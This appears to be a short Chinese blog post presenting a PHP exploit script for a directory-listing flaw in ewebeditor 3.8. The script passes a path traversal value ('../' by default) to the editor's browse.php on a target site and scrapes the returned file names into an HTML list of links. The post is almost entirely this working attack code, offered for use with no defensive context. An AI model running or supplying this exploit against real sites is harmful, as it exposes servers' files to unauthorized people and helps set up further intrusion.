ewebeditor 3.8 列目录漏洞利用

作者: admin 分类: 未分类 发布时间: 2016-04-21 16:47

<?php
function getdir($dir){
$dir= str_replace('..','',$dir);
$dir= str_replace('//','/',$dir);
return $dir;
}

$result='result.html';
if(file_exists($result)){
unlink($result);
}

$argv[1]?$dir=$argv[1]:$dir='../';
$currentdir='uploadfile';
$url='http://www.taget.com/editor/php/browse.php';
$palyload="$url?style=mini&type=FILE&dir=$dir";

function geturl($url){
return parse_url($url, PHP_URL_SCHEME).'://'.parse_url($url, PHP_URL_HOST);
}


$html= file_get_contents($palyload);
preg_match_all('#<td noWrap>(.*?)<\/td>#',$html,$text);
$file_list=$text[1];
foreach ($file_list as $f){
$u=getdir(geturl($url).$dir.'/'.$f);
echo $u.PHP_EOL;
file_put_contents('result.html',sprintf('<a href="%s">%s</a>   <font face="Verdana" color="#FF0000" size="2"><br>',$u,$u),FILE_APPEND);

}

?>

发表评论

标签云